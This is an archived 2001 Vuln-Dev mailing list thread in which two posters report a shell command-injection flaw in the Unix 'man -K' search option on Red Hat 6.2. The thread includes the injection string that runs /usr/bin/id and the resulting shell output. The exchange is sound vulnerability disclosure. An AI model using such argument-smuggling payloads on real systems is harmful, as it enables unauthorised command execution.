Vulnerability Development mailing list archives
Re: man -K input validation
From: Reb <reb () openrecords org>
Date: Wed, 21 Feb 2001 00:39:26 -0600
When I do the following on a Redhat 6.2 on 2.2.14: man -K "';`/usr/bin/id`" I get repeatedly until I ctrl-c out of it.: sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/Tk_DeleteSelHandler.3' sh: syntax error near unexpected token `;uid=501(r' sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/DeleteImg.3' sh: syntax error near unexpected token `;uid=501(r' sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/Tk_DeleteImage.3' Reb -----Original Message----- From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Rasta C. Shell Sent: Tuesday, February 20, 2001 8:54 AM To: VULN-DEV () SECURITYFOCUS COM Subject: man -K input validation I don't know if this will be any interesting since i don't think it can gives you man uid/gid, but while looking at the man source code to see whats seg-faulting the -K <longbuff> (didn't find anything, maybe it's the grep that faults?) I notice that the -K <input> line is not being validated before calling system, so a: man -K "';`/usr/bin/id`" will run /usr/bin/id by man for you. luckily there's a setuid/gid call before system. -- http://www.rshell.org Join #shellcode on EFnet. rasta () rshell org
Current thread:
- man -K input validation Rasta C. Shell (Feb 20)
- Re: man -K input validation Reb (Feb 21)